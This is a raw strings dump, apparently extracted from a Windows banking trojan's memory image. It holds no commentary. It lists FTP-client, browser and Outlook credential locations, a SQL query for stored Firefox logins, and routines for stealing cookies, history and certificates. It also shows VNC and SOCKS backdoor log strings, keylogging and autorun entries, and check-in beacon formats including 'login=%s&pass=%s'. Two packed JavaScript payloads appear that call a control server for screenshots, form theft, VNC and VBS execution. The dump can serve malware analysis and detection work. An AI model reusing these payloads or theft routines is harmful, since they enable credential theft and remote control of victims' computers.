
\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

%WinDir%\Explorer.EXE

%WinDir%\Explorer.EXE

spoolsv.exe_1436_rwx_00F50000_00054000:

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

